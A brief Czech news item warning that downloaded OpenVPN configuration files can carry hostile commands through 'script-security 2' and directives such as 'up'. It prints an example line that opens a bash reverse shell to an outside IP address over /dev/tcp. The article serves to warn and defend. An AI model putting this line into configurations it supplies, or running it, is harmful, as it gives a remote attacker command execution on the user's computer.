Hlavní navigace

Stažené OpenVPN konfigurační soubory mohou být nebezpečné

Jan Fikar

Jacob Baines upozornil na možnou nebezpečnost OpenVPN konfiguračních souborů stažených z internetu. Příkaz script-security 2 umožní spouštění uživatelských skriptů. Může jít například o reverzní shell, který útočníkovi ze zadané IP adresy umožní provádět příkazy na vašem počítači.

script-security 2
up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’” 

Pro Windows může být konfigurační soubor pozměněn, aby používal PowerShell. Potenciálně nebezpečné příkazy v OpenVPN konfiguračním souboru jsou: up, down, client-connect, learn-addressauth-user-pass-verify.

(zdroj: bleepingcomputer)

Našli jste v článku chybu?